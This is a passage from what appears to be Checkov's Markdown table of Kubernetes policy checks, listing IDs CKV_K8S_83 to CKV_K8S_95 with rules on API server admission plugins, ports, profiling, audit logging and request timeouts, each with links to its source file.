[ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3035 | CKV_K8S_83 | resource | ReplicaSet | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3036 | CKV_K8S_83 | resource | ReplicationController | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | 
[ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3037 | CKV_K8S_83 | resource | StatefulSet | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3038 | CKV_K8S_84 | resource | CronJob | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3039 | CKV_K8S_84 | resource | DaemonSet | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3040 | CKV_K8S_84 | resource | Deployment | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3041 | CKV_K8S_84 | resource | DeploymentConfig | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3042 | CKV_K8S_84 | resource | Job | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3043 | CKV_K8S_84 | resource | Pod | Ensure that the admission 
control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3044 | CKV_K8S_84 | resource | PodTemplate | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3045 | CKV_K8S_84 | resource | ReplicaSet | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3046 | CKV_K8S_84 | resource | ReplicationController | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3047 | CKV_K8S_84 | resource | StatefulSet | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3048 | CKV_K8S_85 | resource | CronJob | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3049 | CKV_K8S_85 | resource | DaemonSet | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3050 | 
CKV_K8S_85 | resource | Deployment | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3051 | CKV_K8S_85 | resource | DeploymentConfig | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3052 | CKV_K8S_85 | resource | Job | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3053 | CKV_K8S_85 | resource | Pod | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3054 | CKV_K8S_85 | resource | PodTemplate | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3055 | CKV_K8S_85 | resource | ReplicaSet | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3056 | CKV_K8S_85 | resource | ReplicationController | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | 
[ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3057 | CKV_K8S_85 | resource | StatefulSet | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3058 | CKV_K8S_86 | resource | CronJob | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3059 | CKV_K8S_86 | resource | DaemonSet | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3060 | CKV_K8S_86 | resource | Deployment | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3061 | CKV_K8S_86 | resource | DeploymentConfig | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3062 | CKV_K8S_86 | resource | Job | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3063 | CKV_K8S_86 | resource | Pod | Ensure that the --insecure-bind-address argument is not set | Kubernetes | 
[ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3064 | CKV_K8S_86 | resource | PodTemplate | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3065 | CKV_K8S_86 | resource | ReplicaSet | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3066 | CKV_K8S_86 | resource | ReplicationController | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3067 | CKV_K8S_86 | resource | StatefulSet | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3068 | CKV_K8S_88 | resource | CronJob | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3069 | CKV_K8S_88 | resource | DaemonSet | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3070 | CKV_K8S_88 | resource | Deployment | Ensure that the --insecure-port argument is set to 0 | Kubernetes | 
[ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3071 | CKV_K8S_88 | resource | DeploymentConfig | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3072 | CKV_K8S_88 | resource | Job | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3073 | CKV_K8S_88 | resource | Pod | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3074 | CKV_K8S_88 | resource | PodTemplate | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3075 | CKV_K8S_88 | resource | ReplicaSet | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3076 | CKV_K8S_88 | resource | ReplicationController | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3077 | CKV_K8S_88 | resource | StatefulSet | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3078 | CKV_K8S_89 | resource | 
CronJob | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3079 | CKV_K8S_89 | resource | DaemonSet | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3080 | CKV_K8S_89 | resource | Deployment | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3081 | CKV_K8S_89 | resource | DeploymentConfig | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3082 | CKV_K8S_89 | resource | Job | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3083 | CKV_K8S_89 | resource | Pod | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3084 | CKV_K8S_89 | resource | PodTemplate | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3085 | CKV_K8S_89 | resource | ReplicaSet | Ensure that the --secure-port argument is not set to 0 | Kubernetes | 
[ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3086 | CKV_K8S_89 | resource | ReplicationController | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3087 | CKV_K8S_89 | resource | StatefulSet | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3088 | CKV_K8S_90 | resource | CronJob | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3089 | CKV_K8S_90 | resource | DaemonSet | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3090 | CKV_K8S_90 | resource | Deployment | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3091 | CKV_K8S_90 | resource | DeploymentConfig | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3092 | CKV_K8S_90 | resource | Job | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3093 | CKV_K8S_90 | resource | Pod | Ensure that the --profiling 
argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3094 | CKV_K8S_90 | resource | PodTemplate | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3095 | CKV_K8S_90 | resource | ReplicaSet | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3096 | CKV_K8S_90 | resource | ReplicationController | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3097 | CKV_K8S_90 | resource | StatefulSet | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3098 | CKV_K8S_91 | resource | CronJob | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3099 | CKV_K8S_91 | resource | DaemonSet | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3100 | CKV_K8S_91 | resource | Deployment | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3101 | CKV_K8S_91 | resource | DeploymentConfig | Ensure 
that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3102 | CKV_K8S_91 | resource | Job | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3103 | CKV_K8S_91 | resource | Pod | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3104 | CKV_K8S_91 | resource | PodTemplate | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3105 | CKV_K8S_91 | resource | ReplicaSet | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3106 | CKV_K8S_91 | resource | ReplicationController | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3107 | CKV_K8S_91 | resource | StatefulSet | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3108 | CKV_K8S_92 | resource | CronJob | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3109 | CKV_K8S_92 | resource | DaemonSet 
| Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3110 | CKV_K8S_92 | resource | Deployment | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3111 | CKV_K8S_92 | resource | DeploymentConfig | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3112 | CKV_K8S_92 | resource | Job | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3113 | CKV_K8S_92 | resource | Pod | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3114 | CKV_K8S_92 | resource | PodTemplate | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3115 | CKV_K8S_92 | resource | ReplicaSet | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3116 | CKV_K8S_92 | resource | ReplicationController 
| Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3117 | CKV_K8S_92 | resource | StatefulSet | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3118 | CKV_K8S_93 | resource | CronJob | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3119 | CKV_K8S_93 | resource | DaemonSet | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3120 | CKV_K8S_93 | resource | Deployment | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3121 | CKV_K8S_93 | resource | DeploymentConfig | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3122 | CKV_K8S_93 | resource | Job | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3123 
| CKV_K8S_93 | resource | Pod | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3124 | CKV_K8S_93 | resource | PodTemplate | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3125 | CKV_K8S_93 | resource | ReplicaSet | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3126 | CKV_K8S_93 | resource | ReplicationController | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3127 | CKV_K8S_93 | resource | StatefulSet | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3128 | CKV_K8S_94 | resource | CronJob | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3129 | CKV_K8S_94 | resource | DaemonSet | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | 
[ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3130 | CKV_K8S_94 | resource | Deployment | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3131 | CKV_K8S_94 | resource | DeploymentConfig | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3132 | CKV_K8S_94 | resource | Job | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3133 | CKV_K8S_94 | resource | Pod | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3134 | CKV_K8S_94 | resource | PodTemplate | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3135 | CKV_K8S_94 | resource | ReplicaSet | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3136 | CKV_K8S_94 | resource | ReplicationController | Ensure that the --audit-log-maxsize argument is set to 100 or as 
appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3137 | CKV_K8S_94 | resource | StatefulSet | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3138 | CKV_K8S_95 | resource | CronJob | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3139 | CKV_K8S_95 | resource | DaemonSet | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3140 | CKV_K8S_95 | resource | Deployment | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3141 | CKV_K8S_95 | resource | DeploymentConfig | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3142 | CKV_K8S_95 | resource | Job | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3143 | CKV_K8S_95 | resource | Pod | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | 
